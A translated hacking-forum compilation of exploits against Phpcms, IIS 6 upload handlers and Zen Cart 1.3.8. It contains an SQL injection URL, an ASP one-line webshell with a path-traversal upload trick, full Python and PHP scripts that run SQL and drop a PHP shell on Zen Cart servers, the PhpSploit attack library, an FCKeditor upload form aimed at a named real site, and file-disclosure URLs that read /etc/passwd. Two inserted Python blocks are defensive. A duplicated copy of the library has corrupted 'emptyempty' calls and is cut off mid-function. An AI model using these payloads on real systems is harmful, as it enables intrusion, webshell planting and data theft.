Phpcms 2008 space.api.php SQL injection vulnerability
EXP:
api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23
Small memo on ASP itself
Server.MapPath() returns the absolute path on the local machine
1. Server.MapPath("/") is the location of the application root directory, e.g.
C:\Inetpub\wwwroot\
2. Server.MapPath("./") is the current directory of the page
Note: equivalent to Server.MapPath(""), which returns the physical file path of the page in which Server.MapPath("") is called
3. Server.MapPath("../") is the parent directory
4. Server.MapPath("~/") is the directory of the current application: if it is the root, this is the root directory; if it is a virtual directory, it is the location of the virtual directory, e.g.
C:\Inetpub\wwwroot\Example\
Note: equivalent to Server.MapPath("~"), i.e. a relative path.
upfile: another miraculous breakthrough
I don't know whether you have run into this when uploading: an upload that does not rename the file, where the upload directory is already fixed by the program,
and script execution has been disabled for that upload directory. I guess most people would give up at this point.
So how do we get past it? It is actually possible. The key is [the name is not changed].
First let's look at an upload request:
POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name="act"
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
Content-Type: text/plain
<%execute(request("cmd"))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name="Submit"
up
-----------------------------7da290150c5e--
The key is:
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
First, how does it decide where the file name begins inside filename? It treats everything after the rightmost "\" in filename as the file name.
Everyone should know that under Windows "\" and "/" are interchangeable.
Suppose the directory the file lands in is upload/
and a directory that is both writable and allows execution is okokok/
Then we only need to construct
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"
Then the file we uploaded has been successfully written to okokok/111.asp;.gif.
Bypassed!
PS: tested successfully on Windows + IIS 6.0.
[Please credit when reposting, thanks for cooperating, otherwise you lose your JJ.]
by www.sb-sb.cn
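As an added defensive example (not part of the post above, nor of any upload script it describes), the following Python contrasts the weak basename logic the post relies on, everything after the rightmost backslash, with a sanitizer that treats both separators alike, cuts off the IIS 6 ";" suffix trick and allow-lists the extension. The sample filenames, including the post's own traversal payload, are constructed inputs.

```python
import re

# Constructed sample filenames; the first two mirror the filename values shown in the post above.
SAMPLE_FILENAMES = [
    r"E:\xxx\xxx\xx\./../okokok/111.asp;.gif",   # traversal via mixed separators
    r"E:\xxx\xxx\xx\111.asp;.gif",               # IIS 6 ';' trick only
    "report.gif",                                # benign
]

ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}


def naive_basename(filename):
    """The weak logic the post describes: keep everything after the rightmost backslash.

    Forward slashes and '..' survive, so the result can still climb out of the upload directory.
    """
    return filename.rsplit("\\", 1)[-1]


def has_path_components(filename):
    """True if the name still carries a directory part or '..' under either separator style."""
    parts = filename.replace("\\", "/").split("/")
    return len(parts) > 1 or ".." in parts


def safe_basename(filename):
    """Reduce an untrusted client filename to a safe leaf name, or return None to reject it.

    Steps: normalise both separators, keep only the leaf, cut at the first ';' (IIS 6 runs
    'x.asp;.gif' as x.asp), require an allow-listed extension, and restrict the stem's charset.
    """
    leaf = filename.replace("\\", "/").rsplit("/", 1)[-1]
    leaf = leaf.split(";", 1)[0]
    stem, _, ext = leaf.rpartition(".")
    if not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)[:64]
    return f"{stem}.{ext.lower()}"


def review_upload_names(filenames=SAMPLE_FILENAMES):
    """Return (original, naive result, traversal flag on the naive result, sanitised result) per name."""
    return [
        (f, naive_basename(f), has_path_components(naive_basename(f)), safe_basename(f))
        for f in filenames
    ]


if __name__ == "__main__":
    for original, naive, traverses, safe in review_upload_names():
        print(f"{original!r}: naive={naive!r} traversal={traverses} safe={safe!r}")
```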
Zen Cart 1.3.8 Remote SQL Execution
#!/usr/bin/python
#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
    global a, b
    for param in sys.argv:
        if(param == '-'+name): return str(sys.argv[b+1])
        b = b + 1
    if(need):
        print '\n#error', "-"+name, 'parameter required'
        exit(1)

if (len(sys.argv) < 2):
    print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| $system> python """+sys.argv[0]+""" -url <url> |
| Param: <url> ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
    exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
    cmd = raw_input('sql@jah$ ')
    if (cmd == "exit"): exit(1)
    req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
    if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
        print '>> success (', cmd, ")"
    else:
        print '>> failed, be sure to end with ; (', cmd, ")"
Zen Cart 1.3.8 Remote Code Execution
<?php
#
# ------- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| \$system> php $argv[0] <url> |
| Notes: <url> ex: http://victim.com/site (no slash) |
| |
========================================================================
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '<?php eval($_POST[a])?> <?php echo realpath('.'); ?>';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_images" => array(frmdt_type => "tgreal/suce", # it works ! o_O
frmdt_filename => $n,
frmdt_content => $code));
if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
else die("\n[!] error - can't upload the shell\n");
print "\nrce@jah\$>";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
$xpl->addheader('SHELL',$cmd);
$xpl->get($url.'/images/'.$n);
print $xpl->getcontent()."\nrce@jah$> ";
# don't forget to "rm *.php" and exit
# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
# to clean the database (record_company & record_company_info)
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array('');
break;
case 'cookie':
$this->cookie = array('');
break;
default:
$this->cookiejar = '';
$this->header = array('');
$this->cookie = array('');
$this->allowredirection = '';
break;
}
}
}
?>
Zen Cart 1.3.8a and below: universal 0day
It is not the
Remote Code Execution Exploit
Remote SQL Execution Exploit
but rather the FCK vulnerability. Heh, I searched and nobody had posted it, so I'm posting it.
Kind souls, please give 2 gold coins, much appreciated.
<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
Everyone, try out its power.
Upload a PHP WEBSHELL directly to IMAGES
Vulnerability 2
Zen Cart local file disclosure
Get the path of the web page:
/extras/ipn_test_return.php
Get the site configuration:
/extras/curltest.php?url=file:///网站地址/includes/configure.php
Read the Linux server's passwd:
/extras/curltest.php?url=file:///etc/passwd
Vulnerability 3
Zen Cart v1.3.9f (typefilter) local file inclusion vulnerability
EXP:http://127.0.0.1/index.php?typef ... %2F..%2Fboot.ini%00
Giving the EXP directly; it is very old and still very powerful......
Vulnerability 4
<?php
#
# ------- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| \$system> php $argv[0] <url> |
| Notes: <url> ex: http://victim.com/site (no slash) |
| |
========================================================================
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '<?php system($_SERVER["HTTP_SHELL"]); ?>';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O
frmdt_filename => $n,
frmdt_content => $code));
if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
else die("\n[!] error - can't upload the shell\n");
print "\nrce@jah\$> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
$xpl->addheader('SHELL',$cmd);
$xpl->get($url.'/images/'.$n);
print $xpl->getcontent()."\nrce@jah$> ";
# don't forget to "rm *.php" and exit
# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
# to clean the database (record_company & record_company_info)
}
}
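The request shapes the exploits in this thread depend on, the `file://` URL handed to `/extras/curltest.php`, the `%00`-terminated traversal in `typefilter`, and the extra `/password_forgotten.php` path segment appended to `/admin/` scripts (the `$trick` in both BlackH scripts), are easy to pick out of web server access logs. The Python below is an added detection example, not code from Zen Cart, BlackH or the poster; the log lines are constructed and the finding labels are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines modelled on the requests shown in this thread.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /extras/curltest.php?url=file:///etc/passwd HTTP/1.1" 200 1834
10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /index.php?typefilter=..%2F..%2F..%2Fboot.ini%00 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2010:10:00:02 +0000] "POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 200 2201
10.0.0.5 - - [01/Jan/2010:10:00:03 +0000] "POST /admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1" 200 3310
10.0.0.9 - - [01/Jan/2010:10:00:04 +0000] "GET /index.php?main_page=index&cPath=3 HTTP/1.1" 200 9930
10.0.0.9 - - [01/Jan/2010:10:00:05 +0000] "GET /extras/curltest.php?url=http://www.example.com/ HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# An /admin/ script invoked with a trailing path segment, e.g. sqlpatch.php/password_forgotten.php
ADMIN_PATHINFO_RE = re.compile(r"^/admin/[^/]+\.php/.+")
FETCH_SCHEMES = {"http", "https"}


def classify_request(method, target):
    """Return finding labels (my own names) for one request; an empty list means nothing matched."""
    findings = []
    parts = urlsplit(target)
    path = parts.path
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs percent-decodes values

    # Vulnerability 2 in the thread: curltest.php asked to fetch a non-HTTP URL such as file:///etc/passwd
    if path.endswith("/extras/curltest.php"):
        for url in params.get("url", []):
            if urlsplit(url).scheme.lower() not in FETCH_SCHEMES:
                findings.append("curltest-non-http-scheme")

    # Vulnerability 3: directory traversal or a NUL byte in typefilter
    for value in params.get("typefilter", []):
        if "../" in value or "..\\" in value or "\x00" in value:
            findings.append("typefilter-traversal")

    # The $trick used by both BlackH exploits: an admin script called with extra path info
    if ADMIN_PATHINFO_RE.match(path):
        findings.append("admin-script-with-path-info")

    return findings


def scan_log(text=SAMPLE_LOG):
    """Parse each line and return (ip, method, target, findings) for every line that raises a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production scanner would count and report these
        findings = classify_request(m["method"], m["target"])
        if findings:
            hits.append((m["ip"], m["method"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, method, target, findings in scan_log():
        print(f"{ip} {method} {target} -> {', '.join(findings)}")
```

Matching on the decoded query string matters here: the traversal line is only recognisable after `%2F` and `%00` are decoded, which `parse_qs` does for you.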
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!emptyempty($this->proxyhost) && !emptyempty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!emptyempty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!emptyempty($this->header))
$this->packet .= $this->showheader();
if(!emptyempty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(emptyempty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(emptyempty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
